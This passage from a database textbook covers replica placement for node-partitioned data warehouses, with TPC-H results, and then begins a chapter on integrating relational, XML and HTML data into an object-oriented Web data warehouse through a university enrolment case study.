   For (replica = 1 to R)
      data for node i is also placed in node (i + replica) MOD N;

This simple strategy allows the system to work with unavailable nodes, and it is possible to take more than one node off-line simultaneously. The major drawback is processing efficiency when a few nodes become unavailable: consider an NPDW system with N homogeneous nodes. Although normally each node contains and processes about 1/N of the data, if one node fails, the node replacing it with a replica will have to process twice as much data (2/N), even though all the other nodes will process only 1/N. The replica effort is placed on a single node, even though other nodes are less loaded. An alternative to full replicas is to use fully partitioned replicas (FPRs): replicas are partitioned into as many slices as there are nodes minus one. If there are N nodes, a replica is partitioned into N−1 slices and each slice is placed in one node. The replica of node i is thus dispersed over all nodes except node i. In order to allow up to R nodes to become unavailable, there must be R nonoverlapping replica slice sets. Two replicas are nonoverlapping if the equivalent slices of the two replicas are not placed in the same node. The following placement algorithm is used:

Number the nodes linearly;
The copy of the data of node i is partitioned into N−1 numbered slices, starting at 1;
For (slice set j = 0 to R)
   For (slice x from 1 to N−1)
      Place slice x in node (i + j + x) MOD N;

This strategy is the most efficient because, considering N nodes, each replica slice has 1/(N−1) of the data and each node has to process only that fraction in excess in case of a single node becoming unavailable. However, all nodes that remain active are needed to process a slice from the replica.
Figure 14. Schema in node X with replicated schema from node Y
In order to allow up to R nodes to become unavailable, there must be R nonoverlapping replica slice sets. If we want y nodes to be able to be off-line simultaneously when a single replica is used, then the y nodes must not contain replica slices of each other. Partitioned replicas (PRs) guarantee this by creating groups and placing the replica slices from one group in a different group. This way we can take a whole group off-line simultaneously for maintenance or other functionality, because the complete set of replica slices is elsewhere. This strategy is a hybrid between FPR and FR. If replicas are partitioned into x slices, we denote it by PR(x). If x = N, we have a fully partitioned replica. A very simple algorithm to generate fewer than N slices is:

Number the nodes linearly;
The data for node i is partitioned into X slices, starting at 1;
For (slice set j = 0 to R)
   For (slice x from 1 to X)
      Place slice x in node (i + j + x) MOD N;
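A compact sketch of these placement schemes, assuming nodes numbered 0..N−1 and using plain dictionaries for the bookkeeping (names and data structures are illustrative only), is:

def full_replicas(n, r):
    """FR: the whole of node i's data is copied to nodes i+1 .. i+r (mod n)."""
    return {i: [(i + k) % n for k in range(1, r + 1)] for i in range(n)}

def partitioned_replicas(n, slice_sets, x):
    """PR(x): node i's data is cut into x slices; slice set j places slice s
    on node (i + j + s) mod n.  With x = n - 1 this is FPR."""
    return {i: [((i + j + s) % n, s) for j in range(slice_sets)
                for s in range(1, x + 1)] for i in range(n)}

# 20 nodes, one replica: FR puts node 0's whole copy on one neighbour, while
# PR(10) spreads it over 10 nodes so the extra load per node stays small.
print(full_replicas(20, 1)[0])            # node 0 fully replicated on node 1
print(partitioned_replicas(20, 1, 10)[0]) # node 0's 10 slices on nodes 1..10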
Figure 15. Response time and replicas when 5 out of 20 nodes are off-line (average over TPC-H)
Figure 15 compares the response time (line) for TPC-H query Q9 and the minimum number of replicas needed (bars) when 5 out of 20 nodes are off-line, using full replicas (FRs), fully partitioned replicas (FPRs), and partitioned replicas (PRs). These results were obtained on a system with the following characteristics: 50 GB TPC-H; 20 nodes, each with an 866 MHz processor and 512 MB of RAM. The alternatives compared are: online (every node is online); FR (full replicas); FPR (fully partitioned replicas); PR(10) (partitioned replicas with two groups of 10 nodes); and PR(5) (partitioned replicas with four groups of 5 nodes). These results show the much larger penalty incurred by FR and the excessive number of replicas required for FPR to allow 5 nodes off-line simultaneously. PR(10), partitioned replicas with two 10-element groups, is a good choice, as it requires a single replica and at the same time obtains a good response time. Given these results, we conclude that replicas partitioned by groups are the most advantageous alternative for the NPDW if we consider both performance and flexibility in allowing multiple nodes to be taken off-line simultaneously for maintenance and loading reasons.

FUTURE TRENDS
The NPDW is the basic design for the Data Warehouse Parallel Architecture Project (DWPA, 2005), which focuses on architectural characteristics, automatic reorganization, load balancing, response time prediction, and automatic adaptability for the low-cost node-partitioned data warehouse. These are in line with current and future trends in database research on related issues, which include database self-tuning and auto-configuration (Chaudhuri & Weikum, 2002; Schiefer & Valentin, 1999; Weikum, Moenkeberg, Hasse, & Zabback, 2002). Runtime prediction is also an important objective for current and future research on database engines. There are very interesting recent works on runtime estimation and improvement (Chaudhuri, Narasayya, & Ramamurthy, 2004; Luo, Naughton, Ellmann, & Watzke, 2004) that can be usefully adapted to parallel settings and in particular to the NPDW environment. There is nowadays a market trend
towards more and more open-source software, including open-source database engines being deployed in organizations, and cost-consciousness in both hardware and software platforms is increasingly important. In this context, the DWPA concept of an architecture that can run anywhere efficiently and adaptively also seems to be in line with current trends. Moreover, many of the issues discussed in this chapter can also be applied to other parallel architectures that are increasingly deployed, in particular symmetric multiprocessors (SMPs) and clusters of SMPs.
CONCLUSION
We have discussed design issues for low-cost alternatives to specialized, fast, and fully dedicated parallel hardware to handle large data warehouses. The idea is to design the system with special care concerning partitioning for placement and reorganization, and also concerning availability. Alternative partitioning strategies were proposed and their performance compared. We have tested replication-based and partitioning-based strategies and analyzed their performance against the number of nodes and the available network bandwidth. We also tested the use of early selection with join bitmaps as an approach to overcome the extra overheads related to repartitioning and overall processing. We concluded that workload-based partitioning is a suitable strategy, and that join bitmaps not only improve speedup but also prevent significant slowdown when the available network bandwidth is low. We have also described replication-based availability that allows always-on behavior and efficiency when multiple nodes are taken off-line.
ACKNOWLEDGMENTS This work was supported in part by the Portuguese “Fundação para a Ciência e Tecnologia,” under project POSC/EIA/57974/2004.
REFERENCES Bernstein, P. A., & Chiu, D. M. (1981). Using semi-joins to solve relational queries. Journal of the ACM, 28(1), 25-40. Chan C.-Y., & Ioannidis, Y. E. (1998). Bitmap index design and evaluation. In Proceedings of the International Conference on the Management of Data (pp. 355-366). Chaudhuri, S., Narasayya, V., & Ramamurthy, R. (2004). Estimating progress of execution for SQL queries. In Proceedings of the ACM International Conference on Data Management, Paris. Chaudhuri, S., & Weikum, G. (2002). Rethinking database system architecture: Towards a self-tuning, RISC-style database system. In Proceedings of Very Large Databases Conference. Copeland, G., & Keller, T. (1989). A comparison of high-availability media recovery techniques. In Proceedings of the ACM International Conference on Management of Data. Coulon, C., Pacitti, E., & Valduriez, P. (2004, June 28-30). Scaling up the preventive replication of autonomous databases in cluster systems. In Proceedings of the 6th International Vecpar Conference, Valencia, Spain. DeWitt, D., & Gray, J. (1992). The future of high performance database processing. Communications of the ACM, 35(6). DWPA. (2005-2008). Fundação para a Ciência e a Tecnologia (Research and Development Project POSI/EIA/57974/2004 of FCT), Portugal. Furtado, P. (2004a, July). Hash-based placement and processing for efficient node partitioned query-intensive databases. In Proceedings of the Tenth International Conference on Parallel and Distributed Systems (pp. 127-134). Newport Beach, California.
675
Efficient and Robust Node-Partitioned Data Warehouses
Furtado, P. (2004b, September). Workload-based placement and join processing in node-partitioned data warehouses. In Proceedings of the International Conference on Data Warehousing and Knowledge Discovery (pp. 38-47).Zaragoza, Spain. Furtado, P. (2004c, November). Experimental evidence on partitioning in parallel data warehouses. In Proceedings of the ACM DOLAP 04 Workshop of the International Conference on Information and Knowledge Management, Washington. Furtado, P. (2005a, May). Efficiently processing query-intensive databases over a non-dedicated local network. In Proceedings of the 19th International Parallel and Distributed Processing Symposium, Denver, Colorado. Furtado, P. (2005b, April). The issue of large relations in node-partitioned data warehouses. In Proceedings of the International Conference on Database Systems for Advanced Applications, Beijing, China. Furtado, P. (2005c, August). Replication in node partitioned data warehouses. In Proceedings of the VLDB Ws. on Design, Implementation, and Deployment of Database Replication, Trondheim, Norway. Hsiao, H., & DeWitt, D. (1990a). Chained declustering: A new availability strategy for multi-processor database machines. Paper presented at the International Conference on Data Engineering. Hsiao, H., & DeWitt, D. (1990b). Replicated data management in the Gamma Database Machine. Paper presented at the Workshop on the Management of Replicated Data. Hsiao, H., & DeWitt, D. J. (1991). A performance study of three high availability data replication strategies. In Proceedings of the Parallel and Distributed Systems. Hua, K. A., & Lee, C. (1990, August). An adaptive data placement scheme for parallel database
676
computer systems. In Proceedings of the Sixteenth Very Large Data Bases Conference (pp. 493-506). Brisbane, Queensland, Australia. Kimball, R., Reeves, L., Ross, M., & Thornthwaite, W. (1998). The data warehouse life cycle toolkit. John Wiley & Sons. Kitsuregawa, M., Tanaka, H., & Motooka, T. (1983). Application of hash to database machine and its architecture. New Generation Computing, 1(1), 63-74. Lin, Y., Kemme, B., & Jimenez-Peris, R. (2005, August 30-September 2). Consistent data replication: Is it feasible in WANs? In Proceedings of the 11th International Europar Conference, Lisboa, Portugal. Luo, G., Naughton, J. F., Ellmann, C. J., & Watzke, M. W. (2004). Toward a progress indicator for database queries. In Proceedings of the ACM International Conference on Data Management, Paris. O’Neil, P., & Graefe, G. (1995). Multi-table joins through bitmapped join indices. SIGMOD Record, 24(3), 8-11. Pacitti, E., Özsu, M., & Coulon, C. (2003, August 26-29). Preventive multi-master replication in a cluster of autonomous databases. In Proceedings of the 9th International Europar Conference, Klagenfurt, Austria. Patterson, D. A., Gibson, G., & Katz, R. H. (1998, June). A case for redundant arrays of inexpensive disks (raid). In Proceedings of the International Conference on Management of Data (pp. 109116). Chicago. Rao, J., Zhang, C., Megiddo, N., & Lohman, G. (2002, June). Automating physical database design in a parallel database. In Proceedings of the ACM International Conference on Management of Data (pp. 558-569). Madison.
Efficient and Robust Node-Partitioned Data Warehouses
Rousopoulos, R. (1998). Materialized views and data warehouses. SIGMOD Record, 27(1), 21-26.
TPC. (1999, June). TPC Benchmark H, Transaction Processing Council. Retrieved June 13, 2006, from http://www.tpc.org/
Saborit, J. A., Mulero, V. M., & Pey, J. L. (2003). Pushing down bit filters in the pipelined execution of large queries. In Proceedings of the International Conference Europar (pp. 328-337).
Valduriez, P., & Ozsu, M. (1999). Principles of parallel and distributed database systems (3rd ed.). Prentice Hall.
Schiefer, B., & Valentin, G. (1999). DB2 universal database performance tuning. IEEE Data Engineering Bulletin, 22(2), 12-19. Shatdal, A., & Naughton, J. (1995, May 22-25). Adaptive parallel aggregation algorithms. In Proceedings of the 1995 International Conference on Management of Data, San Jose, California (pp. 104-114).
Weikum, G., Moenkeberg, A., Hasse, C., & Zabback, P. (2002). Self-tuning database technology and information services: From wishful thinking to viable engineering. In Proceedings of the Very Large Databases Conference. Williams, M., & Zhou, S. (1998). Data placement in parallel database systems: Parallel database techniques. IEEE Computer Society Press (pp. 203-219).
Stöhr, T., Märtens, H., & Rahm, E. (2000). Multidimensional database allocation for parallel data warehouses. In Proceedings of the 26th International Conference on Very Large Databases (VLDB), Cairo, Egypt.
Yu, C. T., Guh, K. C., Brill, D., & Chen, A. L. P. (1989, June). Partition strategy for distributed query processing in fast local networks. IEEE Transactions on Software Engineering, 15(6), 780-793.
Tandem. (1987, September). NonStop SQL, a distributed, high-performance, high-reliability implementation of SQL. Paper presented at the Workshop on High Performance Transactional Systems, California.
Yu, C. T., & Meng, W. (1998). Principles of database query processing for advanced applications. Morgan Kaufmann.
Zilio, D. C., Jhingran, A., & Padmanabhan, S. (1994). Partitioning key selection for a sharednothing parallel database system (IBM Research Rep. No. RC 19820 (87739)). IBM.
This work was previously published in Data Warehouses and OLAP: Concepts, Architectures and Solutions, edited by R. Wrembel and C. Koncilia, pp. 203-229, copyright 2007 by IRM Press (an imprint of IGI Global).
Chapter 2.15
Web Data Warehousing Convergence:
From Schematic to Systematic
D. Xuan Le, La Trobe University, Australia
J. Wenny Rahayu, La Trobe University, Australia
David Taniar, Monash University, Australia
ABSTRACT This article proposes a data warehouse integration technique that combines data and documents from different underlying documents and database design approaches. The well-defined and structured data such as relational, object-oriented and object relational data, semi-structured data such as XML, and unstructured data such as HTML documents are integrated into a Web data warehouse system. The user specified requirements and data sources are combined to assist with the definitions of the hierarchical structures, which serve specific requirements and represent a certain type of data semantics using object-oriented features including inheritance, aggregation, association, and collection. A conceptual integrated data warehouse model is then specified based
on a combination of user requirements and data source structure, which creates the need for a logical integrated data warehouse model. A case study is then developed into a prototype in a Web-based environment that enables the evaluation. The evaluation of the proposed integration Web data warehouse methodology includes the verification of correctness of the integrated data, and the overall benefits of utilizing this proposed integration technique.
INTRODUCTION AND MOTIVATION Currently, there are more and more techniques being provided to accommodate the high demand for exchanging and storing business information including Web and operational data. While the
well-defined structured data are operated and stored in relational, object-oriented (Buzydlowski, 1998), object relational database environments, semi-structured data in XML or unstructured documents are stored in HTML. The problem of related information being separated and stored in multiple places happens quite often within an organization. Information from these applications is extracted and further developed into business analysis tools such as OLAP and data warehousing, which aim to support data analysis, business requirements, and management decisions. Relevant business Web data have rapidly increased in significant amounts. Recently, XML has increased in popularity and has become a standard technique for storing and exchanging information over the Internet. The data integration (Breitbart, Olson, & Thompson, 1986) in the data warehousing has certainly received a lot of attention. There are three particular articles that are very close to the work in this article. Jensen, Moller and Pedersen (2001) allow an integration of XML and relational data. Even though the object-oriented concept is used in this model, the semantic contribution in this work lacks objectoriented features. Therefore, the semantics of data have been only partially supported. Other systems (Golfarelli, Rizzi, & Birdoljak, 1998, 2001; Huang & Su, 2001) focus on supporting Web data at the schematic level. While their initial focus is to incorporate XML data, Relational data have also been mentioned but not yet been incorporated. They mostly concentrate on the creation of a logical model. Hence, it is clear that there is yet to be developed a standard integration technique that provides a means of handling multiple data sources being integrated into a data warehouse system (Bonifati, Cattaneo, Ceri, Fuggetta, & Paraboschi, 2001), and allowing a full capture of semantics of data in the data source models. The purpose of this article can be summarized as follows:
• To ensure the integration technique allows a meaningful, uniform integrated object-oriented data warehouse structure.
• To ensure the integrated data and their semantics are explicitly and fully represented.
• To ensure a proposed integrated data warehouse system with consistency and high quality.
• To ensure the correctness of the integrated data and benefits such as the usefulness of the proposed integrated data warehouse system.
Figure 1 shows an overview of the proposed works in this article. The integration technique starts with a conceptual integrated data warehouse model (Ezeife & Ohanekwu, 2005) where the user requirement and underlying data source structures are used to assist with the design. The integrated Web data warehouse conceptual model deals with class formalization and hierarchical structures. The specified conceptual integrated Web data warehouse model has created a need for an integrated Web data warehouse logical model where underlying source structures are then absorbed and specified onto the existing conceptual Web integrated Web data warehouse model. The proposed Web integrated data warehouse models are then translated into a suitable
Figure 1. Integration Web data warehouse overview
implementation format, which enables a prototype to be developed. In order to confirm the efficiency of the proposed integration technique, a verification of integrated data is for the purpose of confirming the correctness and quality in the integrated data. This is done so that for each query requirement, a query is issued to access the integrated data warehouse system, and a set of queries access independent systems. The result that is obtained by the query that accessed the integrated data warehouse system is equivalent with the accumulative result that is obtained by queries that access one or more data source systems. The verification of the result would confirm the correctness and consistent quality of the integrated data alone, and the integration technique in general.
A SURVEY OF EXISTING DATA WAREHOUSE INTEGRATION APPROACHES The existing approaches are classified into three categories. Table 1 briefly summarizes the existing approaches by category. Category 1 includes the existing integration technique that can integrate only relational data into a data warehouse system. A data integration problem solved by proposing two approaches, namely, declarative and procedural can be found in the works of Calvanese, Giacomo, Lenzerini, and Rosati, (1998) and Lenzerini (2002) where as Cabibbo and Torlone (1998) and Gopalkrishman, Li, and Karlapalem (1998) propose different techniques to integrate data that are based on the requirements gathered from the user specification and also from studying the conceptual design of the operational source data. In order to create the model, a matching of requirements to sources is needed before creating fact and dimensions. Category 2 shows techniques for handling complex information, which are different from the techniques that handle simple data types, which are available in the relational database. An object 680
data warehouse approach allows an integration of both simple and complex data types. Its main function is to accomplish all important objectoriented concepts and additional features such as object ID and persistent object handling. An object-oriented model extends the technique to handle the transition from relational data to object data (Filho et al., 2000; Gopalkrishman et al., 1998; Hammer, Garcia-Molina, Widom, Labio, & Zhuge, 1995; Huynh et al., 2000). However, the proposed model lacks a utilization of object-oriented features that result in insufficient representation of the semantics. Miller et al. (1998) introduce an object view in the mapping technique. They adopted the extensive view system to create views. However, views creation depends on the number of base classes. Category 3 has allowed the data integration to move on to an advanced level where XML data is the main motivation. Web data nowadays can easily be found in XML structure, which has many possibilities for data modeling. This is because XML is well designed to support object-oriented modeling concept; the data semantics are very rich. Therefore, techniques for integrating XML data into a data warehouse system (Nassis et al., 2005; Rusu, Rahayu, & Taniar, 2004, 2005) needs to take more cautious because unlike relational and object data, XML data are classified as semi-structure. While Golfarelli et al. (2001) try to deal with DTD and XML schema, Jensen et al. (2001) propose query to distribute XML data to an OLAP database according to the data representation. Part of our work is very much similar to the work of Jensen et al. (2001), we consider both XML and relational data for integration, and we also combine user requirements and underlying data structures to assist with the design. The difference between our work and the rest is that now we are handling three categories simultaneously. Not only are relational and XML data being considered, we also consider object data and other Web data structure such as HTML.
Table 1. Categorization and summary of existing work

1. Integrated relational data in data warehousing
• Gupta and Mumick (1995). Logical model: views. Analysis and comments: map local source structures to global views to accomplish specific needs.
• Calvanese et al. (1998). Conceptual model: reasoning techniques; logical model: declarative and procedural. Analysis and comments: rewrite queries procedurally to declare relationships between the data source structures and the data warehouse structure.
• Cabibbo et al. (1998); Gopalkrishman et al. (1998). Conceptual model: relational star schema and goal-driven analysis. Analysis and comments: specify user requirements on a star schema; apply goal-driven analysis for selecting information for the target schema.

2. Integrated relational and object data in data warehousing
• Chen, Hong, and Lin (1999); Filho, Prado, and Toscani (2000); Mohamah, Rahayu, and Dillon (2001). Model: object-oriented model. Analysis and comments: lack semantic representations; use only an aggregation modeling feature to represent the data.
• Miller, Honavar, Wong, and Nilakanta (1998); Serrano, Calero, and Piattini (2005). Model: mapping object views. Analysis and comments: extensive views allow various levels of mapping; a prototype is developed to materialize views.
• Gopalkrishman et al. (1998); Huynh, Mangisengi, and Tjoa (2000). Model: object-oriented model and mapping object methodology. Analysis and comments: lack semantic representations; use only inheritance modeling features to represent the data; the reversible mapping from the object to the relational environment can lose data semantics.

3. Integrated relational, object, and Web data (HTML/XML) in data warehousing
• Golfarelli et al. (2001). Conceptual model: attributes tree model; logical model: relational star schema. Analysis and comments: integrate XML data based on DTD and XML schema; lack of data representation, showing only the aggregation relationship.
• Jensen et al. (2001); Byung, Han, and Song (2005); Nummenmaa, Niemi, Niinimäki, and Thanisch (2002). Model: UML model. Analysis and comments: address both XML and relational data; enable queries to distribute XML data in an OLAP database.
• Nassis, Rahayu, Rajugan, and Dillon (2004). Model: UML model. Analysis and comments: address only XML data; specify user requirements and XML structures on the object-oriented model.
PROBLEM DEFINITION AND BACKGROUND Identified Problems Schemas The most popular existing model in data warehousing is the star schema. The star schema allows
business requirements to be organized and represented in a fact and dimensions surrounding fact. Dimensions are modeled on a flat level; therefore, it limits the data representations for both relationships and business requirements. Unlike the star schema, the snowflake or star flake schema provides modeling of hierarchical relationships within the dimensions. The existence of hierarchies in the dimensions stores the whole
attribute hierarchically and shows only one type of relationship, which is association. While it improves on the modeling representation, it creates more data-model complexity and therefore introduces implemental complexities. The integration of the real world problems can be represented in a multidimensional model that consists of dimensions and fact using the hierarchical concept. Allowing for hierarchies in the dimensions would reduce the complexity of snowflake and star flake to a more efficient and clean integrated model while still being able to achieve a full data semantic capture.
Data Retrieval The translation of the integrated data warehouse model into an implementation-ready format aims to address the adaptation of the object-oriented modeling concept into an implementation database environment where both object data and relational structures are maintained. Retrieved information must be correct and consistent in this proposed implementation when complex queries are specified in OLAP components. Performance of complex queries must be achievable in an efficient data accessing manner against the existing complex queries of the existing systems.
Background We adopt object-oriented features, a semantic network diagram, and the TKPROF utility to assist with our strategy for solving the problem. They are briefly described as follows: •
Object-oriented design concept: The powerful features have allowed a problem to be modeled in much better semantics representations. Collection type allows the multi-values attribute to handle the storing of data in a more efficient manner using ROW, SET, and ARRAY. Features like aggregation allow a whole problem to be modeled as
“part-of” where a lower hierarchy is part of the upper one, or part can be an existencedependent or existence-independent. When the part is considered as existence dependent, it means that the part cannot be shared with other classes or removed from the whole. Whereas, Existence independent is where the part can be shared with other classes and can be removed independently of the whole. An inheritance (Rahayu, 1999; Rahayu, Chang, Dillon, & Taniar, 2000) type is where the problem is modeled as a super class with sub-classes. The sub-class utilizes the information in the super-class and its own information to specialize itself. An association relationship represents a connection between two objects. There are three types of association relationships such as one to one, one to many, and many to many. The type being used depends on the criteria of the problem. •
Semantic Network Diagram: If given an XML document as one of the data sources, we employ the semantic network diagram (Feng, Chang, & Dillon, 2002) to translate XML data into the proposed integrated model. The semantic network diagram is divided into the semantic level and the schema level. The former develops a specific diagram from the XML document structure, and the latter maps from this specific diagram into the target model, an integrated data model. The semantic network diagram is divided into four major components: nodes, directed edges, labels, and constraints. Suppose the semantic network diagram in Figure 2 is studied.
Based on the construction rules to formalize a semantic network diagram (Feng et al., 2002; Pardede, Rahayu, & Taniar, 2004), there are five nodes: A, B, X, Y, Z in the diagram. The first two nodes are the complex nodes while the rest are
Web Data Warehousing Convergence
the basic nodes. There are four directed edges representing the semantic relationships between the objects. In our work, we use different labels to indicate the relationship corresponding to each edge. Different labels are interpreted as follows: •
p indicates “in-property”; g indicates generalization; a indicates aggregation; c indicates composition.
Various types of constraints such as uniqueness, cardinality, ordering, etc., can also be added to the nodes or edges. The modeling representation in Figure 2 presents a well-defined conceptual design from XML data. The attributes or elements declarations and simple or complex type (Pardede, Rahayu, & Taniar, 2005) definitions in XML schema are mapped into the four components or directed edges.
INTEGRATION PROPOSED TECHNIQUE The structures of underlying data sources can be the combination of relational structures and structures that are available in XML documents and object databases. •
we adopt the mapping tool and technique that is proposed in the works of Bishay, Taniar, Jiang, and Rahayu (2000), and Li, Liu, Wang and Peng (2004) to map from HMTL data to XML data so that attributes can be identified. Figure 4 shows HTML data that are translated to XML schema using very basic and straight forward mapping steps. More information on the mapping and transforming techniques can be found in these two references.
Translation Technique of HTML Data into XML Structure: Before conducting the integration of a Web data warehouse model,
1.
2.
Mapping Rule: Referring to Figure 3, let the content of table XYZ is a set of rows
and each row contains a set of column
; XYZ is mapped to an XML schema structure;
is mapped to the ;
is mapped to the wihin the sequence. Motivation by a Case Study: To provide a feasible example for this article, we illustrate the proposed approaches based on the need to build a data warehouse system for university enrolments. Information about the enrolments is stored in relational and Web forms. This is due to the fact that each individual faculty uses its own system and none is currently linked.
One faculty might have its own Web-based system while the others, for various reasons, might have just a normal database system to handle the enrolment of students. It is the goal
Figure 2. Semantic network diagram
Y
of the university to construct a data warehouse system in order to analyze student enrolments in areas/subjects/degrees, and also the trend of enrolments in different years including semesters. The university is also interested in the analysis of degree enrolments for a particular area; for example, for the Masters degree, there might be more students enrolled in course work than in research. In some rare cases, a university may be limited in its ability to provide both research and coursework. Thus, it is interesting to see the relationship between these parties. A faculty may be formed by one or more schools, and a certain number of degrees belong to a particular school. A study of an advanced subject is required for some prerequisites. The university would like information about the prerequisites to be kept in the warehouse system for future analysis. Points to consider are that a specific degree belongs to only one faculty. A subject can be attended by students across the degrees. The methodology for specifying the conceptual integrated data warehouse model in two phases is as follows: phase (a) consists of the steps, which are temporarily referred to as conceptual defined sequence, to assist with the process of creating the conceptual integrated dimensions and fact; phase (b) is an extension of phase (a) to allow data structures of relational and HTML/XML
data sources to be fully unified and incorporated in the integrated data warehouse model.
Conceptual Web Integrated Dimensions and Fact Conceptually, starting with the assumptions of the user specified requirements and information related to underlying sources in relational and XML, we form a set of steps for defining our integrated Web data warehouse model. Please note that by this time, HTML data have been translated to XML structure. The methodology consists of the following steps, which we temporarily refer to as a conceptual defined sequence, to assist with the process of creating the model: 1. Simplifying the requirements: Structures of underlying data sources can also be simplified if possible. 2. Defining integrated dimensions involves two sub-steps: (a) Specifying n classes where n ≥ 1; (b) classifying hierarchy: additional specified information by any other means is a great advantage. Suppose two classes A and B in a dimension, the relationship between A and B can either be a, b, or c. a. Aggregation: Deals with the dependence between the classes. Considering the car-
Figure 3. Translating HTML data to XML structure
dinality where needed, -to-one or to-many, between the base classes and sub-classes. b. Inheritance: Categories subtypes and super-types. c. Collection: Handles multi values in an attribute. This relationship in our approach is not for hierarchy building, but rather for storing data in a more efficient manner. d. Association: Is when two classes have an association relationship, using a -to-one; to-many to describe the association between classes 3. Defining Fact: A simple, single fact, which is surrounded by integrated dimensions. Hierarchy and cardinality should be identified.
The conceptual defined sequence is now used to specify the conceptual integrated Web dimensions and fact as follows:
• Inheritance Type Dimension: Dimensional analysis is such as "…The university is also interested in the analysis of degree enrolments for a particular type; for example, for a Masters degree, there may be more students enrolled in course work than in research, but it may be that a university has a strong constraint in providing both research and coursework…." Applying the conceptual defined sequence, a conceptual degree dimension is specified as follows:
1. Simplifying requirements. A Degree can be further classified as a Research Degree or a Coursework Degree.
2. Identified Dimension {Degree}; Classes {Degree, Research, Coursework}; Hierarchy {Generalization}; additional information: the same number of years applies to all Masters degrees. Extra information is needed to support the specialization of a degree type. An inheritance type is an ideal modeling feature because a degree is a generalization and research or coursework is a specialization. No cardinality.
A conceptual degree dimension is derived based on steps 1 and 2, shown in Figure 4.
Collection Type Dimension: Dimensional analysis may be: “…A study of an advanced subject is required for some prerequisites. The university would like information about the prerequisites to be kept in the warehouse system for future analysis…,” applying the conceptual defined sequence; a conceptual degree is specified as follows. 1. Simplifying requirements. A subject needs to store its prerequisites. Each subject has two prerequisites at most. 2. Identified Dimension {Subject} Classes {Subject} Hierarchy{NIL} A collection type is an ideal modeling feature because it allows a prerequisite to be modeled as an attribute that stores multi-values using array, row, set. No cardinality.
A conceptual subject dimension is derived based on step 1 & 2 shown in Figure 5. •
Aggregation Type Dimension: As recalled earlier, we claim that aggregation is further grouped into two groups: Non-shareable-existence dependent and shareable-existence dependent.
Figure 4. A conceptual degree dimension
Non-shareable Existence Independent Type Dimension: Dimensional analysis is such “…A faculty may be formed by one or more schools and a certain number of degrees belongs to a particular school…,” applying the conceptual defined sequence, a conceptual faculty is specified as follows: 1. Simplifying requirements. A Faculty can own none or more than one school. 2. Identified Dimension {Faculty} Classes {Faculty, School}
Hierarchy {Aggregation}; additional information: a Faculty can exist without a School. One-to-many. A conceptual faculty dimension is derived based on the information above, shown in Figure 6.
Figure 5. A conceptual subject dimension SubjectDim ension
Figure 6. A conceptual faculty dimension FacultyDimension
Shareable Existence Independent Type Dimension: Dimensional analysis is such as "…also the trend of enrolments in different years including semesters…." Applying the conceptual defined sequence, a conceptual time dimension is specified in Figure 7. 1. Simplifying requirements. A time can also include a semester; a semester is needed for enrollment. 2. Identified Dimension {Time}; Classes {Time, Semester}; Hierarchy {Aggregation}; additional information: a semester can be shared with other classes. Time has many months or years, and a year has one or more semesters.
Thus, it is a many-to-many as shown in Figure 7.
Figure 7. A conceptual time dimension Tim eDim ension
Fact Class: Fact analysis is such “…compute student enrolment to timely analyze the trends and performance of subjects and degrees in faculties….” From item 3 in section A, we have Class{Uni_Fact}; Hierarchy {Association}; one-to-many.
A conceptual fact class is derived in Figure 8 surrounding the support of the conceptual integrated dimensions:
Logical Web Integrated Dimensions and Fact
In this section, the rest of the integrated dimensions and facts are specified in greater detail to directly utilize the structures of underlying sources. It
Figure 8. Conceptual fact surrounded by integrated dimensions
assumes that both relational data sources and HTML/XML documents are retrieved based on the user requirements and available structures in the sources. •
Adding Attributes to Collection type Dimension: A Semantic network diagram has not yet formalized a representation for a collection type. Thus, we propose a “C” label indicating a collection type that represents a semantic in the data complex type.
With reference to Figure 9, shows relational data & semantic network diagram Attrs{A, B, M1, M2..Mn} are simple data types; Attrs{M1, M2} are multi-valued attributes in relational table; And Attrs{M1, M2} sub-elements in Semantic Network Diagram; ComplexType (Type 1, Type 2}. Adding attributes to a collection type dimension consists of two steps: •
Step 1: For a relational data source table that has attributes {A, B, M1, M2}, which are required for analytical information: attributes {A, B} are added to Dimension 1; attributes {M1, M2} are stored in a {C} attribute that has a VARRAY type. Attribute {C} is an array type that takes two elements, and it is also added to Dimension 1.
Step 2: For two complex types, namely Type 1 and Type 2, with elements {A, B} and {M1, M2} respectively, Type 2 is an inner complexType element of Type 1 and contains sub-elements {M1, M2}. Thus, elements {A, B} in Type 1 are mapped to attributes {A, B} in Dimension 1; sub-elements {M1, M2} are mapped to an element {C} in Dimension 1. Note that element {C} is defined as a VARRAY type in Step 1.
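A small sketch of these two steps, with the dimension record held as a plain Python dictionary and the collection attribute C as a bounded list standing in for the VARRAY (all names here are illustrative), might be:

MAX_ELEMENTS = 2   # the VARRAY in the text takes at most two elements

def from_relational(row):
    """Step 1: {A, B} become ordinary attributes, {M1, M2} are folded into C."""
    return {"A": row["A"], "B": row["B"],
            "C": [row["M1"], row["M2"]][:MAX_ELEMENTS]}

def from_xml(type1_element):
    """Step 2: elements {A, B} of Type 1 map to {A, B}; the sub-elements
    {M1, M2} of the inner Type 2 map to the collection attribute C."""
    inner = type1_element["Type2"]
    return {"A": type1_element["A"], "B": type1_element["B"],
            "C": [inner["M1"], inner["M2"]][:MAX_ELEMENTS]}

print(from_relational({"A": 1, "B": "x", "M1": "m1", "M2": "m2"}))
print(from_xml({"A": 2, "B": "y", "Type2": {"M1": "p1", "M2": "p2"}}))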
Example: Conceptual subject dimension in Figure 5 is now presented here to add appropriate attributes and data structures in order to complete the integration of a logical integrated subject dimension shown (Figure 10).
Figure 9. Specifying data sources in dimension using collection type
Figure 10. Adding/mapping attribute data to the conceptual integrated subject dimension
Step 1: For subject relational data table provided by health and science faculty with a set of attributes {Subjectid, Subjectname, Req1, Req2}, which are required for analytical information. Attributes {SubjectID, Sub-
jectname} are added to the conceptual subject dimension. Attributes {Req1, Req2} are stored in a VARRAY element {Prerequisites}, which can take two elements in a single record. Attribute {Prerequisite} is
then also added to the subject dimension; refer to SubjectDimension in Figure 10.
Step 2: For an outer complex type SubjectType with elements {Subjectid, Subjectname, Refsubject}, {Refsubjectprereq} is an inner complexType element of SubjectType, and the Refsubject complexType contains sub-elements {Req1, Req2}. Thus, elements {Subjectid, Subjectname} in SubjectType are mapped to attributes {Subjectid, Subjectname} in SubjectDimension, which were added in Step 1. Elements {Req1, Req2} are mapped to element {Prerequisite}, and element {Prerequisite} can contain up to two sub-elements, as formed in Step 1. A complete subject integration forms the following classes and attributes:
SubjectDimension {SubjectID, Subjectname, prerequisite}
